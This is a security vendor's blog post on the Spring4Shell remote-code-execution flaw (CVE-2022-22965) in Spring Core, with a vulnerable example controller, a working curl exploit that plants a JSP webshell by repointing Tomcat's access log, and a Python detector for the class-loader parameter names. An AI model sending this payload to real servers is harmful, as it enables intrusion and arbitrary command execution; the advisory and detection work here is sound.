FourCore
Last Updated on Fri Apr 1, 2022
Critical Zero-Day RCE Vulnerability in Spring Core: Spring4shell (CVE-2022-22965)
Written by Aarush Ahuja
Co-founder @ FourCore
Exploiting Spring4shell in an intentionally vulnerable application

TL;DR: CVE-2022-22965 is a Critical Zero-Day RCE Vulnerability in Spring Core caused by the way Spring deserializes request parameters onto Java objects. We have created an open-source exploit PoC with a vulnerable application and exploit payload you can try right now: spring4shell-exploit-poc.

How was Spring4shell or CVE-2022-22965 discovered?

On March 29th 2022, a Chinese security researcher on Twitter released screenshots showing RCE in a Spring Core application, which has since been assigned CVE-2022-22965. The researcher also released a Python exploit and a vulnerability report written in Chinese. The tweets have since been deleted and the researcher has deleted their accounts.

Assigning the CVE took some time, as the vulnerability posted by the researcher had to be analysed and confirmed first. The CVE was assigned on March 31st, 2022, rated Critical with a CVSS score of 9.8.

How does Spring4shell work?

Our HelloController below contains a @PostMapping to /greeting. When we POST to this route on the Tomcat server, http://app/helloworld/greeting, Spring transforms the HTTP request data into a POJO (Plain Old Java Object), in this case a Greeting object. Under the hood, Spring uses deserialization to convert this request data into Java objects, mapping each request parameter name to a property of the Java object. As it turns out, you can set many more properties than those declared on Greeting: nested property paths are followed too, including the properties of the object's own Class.

import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.ModelAttribute;
import org.springframework.web.bind.annotation.PostMapping;

@Controller
public class HelloController {
    // Renders the form with an empty Greeting placed in the model
    @GetMapping("/greeting")
    public String greetingForm(Model model) {
        model.addAttribute("greeting", new Greeting());
        return "hello";
    }

    // Spring binds the POST parameters onto a new Greeting via @ModelAttribute
    @PostMapping("/greeting")
    public String greetingSubmit(@ModelAttribute Greeting greeting, Model model) {
        return "hello";
    }
}

Using curl we combine a few headers with POST data and are able to write a JSP webshell to webapps/ROOT on the container, which gives us Remote Code Execution via http://app/shell.jsp?cmd=<cmd>. The parameter names walk from the Greeting's Class through its ClassLoader to the Tomcat context's first pipeline valve, the access log, and repoint its directory, prefix, suffix and pattern so that the log file written by Tomcat is itself the JSP.

$ curl \
  -H "prefix:<%" \
  -H "suffix:%>//" \
  -H "c:Runtime" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" \
  http://localhost:8080/helloworld/greeting
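The request above reaches the class loader purely through parameter names, so the first thing a defender wants to know is which bound field names to refuse and how to spot them in traffic. The Python below is an added example, not code from this article or from the FourCore PoC repository: it applies the four glob patterns that Spring published as a WebDataBinder.setDisallowedFields() workaround for CVE-2022-22965 to URL-encoded form bodies and reports the offending parameter names. The sample requests are constructed; the PLACEHOLDER value stands in for the JSP payload.

```python
"""Flag Spring data-binding parameter names that traverse into Class /
ClassLoader properties. Added example; not part of the original article
or the FourCore PoC. Sample requests below are constructed."""
from __future__ import annotations

import re
from urllib.parse import parse_qsl

# The glob patterns Spring published as a WebDataBinder.setDisallowedFields()
# workaround: a bound field name is rejected if it starts with "class." or
# "Class.", or contains ".class." / ".Class." anywhere in the property path.
DISALLOWED_FIELD_PATTERNS = ("class.*", "Class.*", "*.class.*", "*.Class.*")


def glob_to_regex(pattern: str) -> re.Pattern[str]:
    """Translate a simple '*' glob into an anchored regular expression."""
    parts = (re.escape(p) for p in pattern.split("*"))
    return re.compile("^" + ".*".join(parts) + "$")


_DISALLOWED = tuple(glob_to_regex(p) for p in DISALLOWED_FIELD_PATTERNS)


def is_disallowed_field(name: str) -> bool:
    """True if binding this field name would step into the target's Class object."""
    return any(rx.match(name) for rx in _DISALLOWED)


def suspicious_params(body: str) -> list[str]:
    """Return the decoded parameter names in a form body or query string that
    match the denylist, sorted and without duplicates."""
    names = {name for name, _ in parse_qsl(body, keep_blank_values=True)}
    return sorted(n for n in names if is_disallowed_field(n))


def scan_requests(requests: dict[str, str]) -> dict[str, list[str]]:
    """Map each request label to its flagged parameter names; only hits are kept."""
    hits = {label: suspicious_params(body) for label, body in requests.items()}
    return {label: names for label, names in hits.items() if names}


# Constructed sample bodies. The second reuses the parameter names from the
# curl request above, with the JSP value replaced by a placeholder.
SAMPLE_REQUESTS = {
    "benign form": "id=1&content=hello%20world",
    "classloader traversal": (
        "class.module.classLoader.resources.context.parent.pipeline.first.pattern=PLACEHOLDER"
        "&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp"
        "&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT"
    ),
    # A nested path (hypothetical "owner" property) is caught by "*.Class.*"
    "nested path": "owner.Class.module.classLoader.DefaultAssertionStatus=true",
    # Prefix without the dot must not be flagged: the glob needs "class."
    "lookalike field": "classification=internal",
}

if __name__ == "__main__":
    for label, names in scan_requests(SAMPLE_REQUESTS).items():
        print(f"{label}: {', '.join(names)}")
```

Running the script flags only the traversal and nested-path samples. In the application itself the same denylist is enforced by registering it on the binder (the published workaround does this from a @ControllerAdvice with an @InitBinder method); scanning request bodies as above is a stopgap for detection at a proxy or in captured traffic, since Tomcat's access log records the request line but not POST bodies.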

Impact of Spring4Shell

The impact of the vulnerability is wide: it is trivial to exploit and a large number of Java applications use Spring, which explains the high CVSS score. The prerequisites for exploitation are common:

  • JDK version 9+
  • Application built on Spring or derived frameworks
  • Running Tomcat with WAR deployment

Depending on frameworks and libraries is unavoidable; however, vulnerabilities such as Spring4Shell and Log4Shell pose immense risk to the organization. You want to ensure that your security controls are working across the attack surface. FourCore ATTACK can help you ensure this by routinely assessing your security controls with real-world attack simulations.

Resources

FourCore ATTACK Breach and Attack Simulation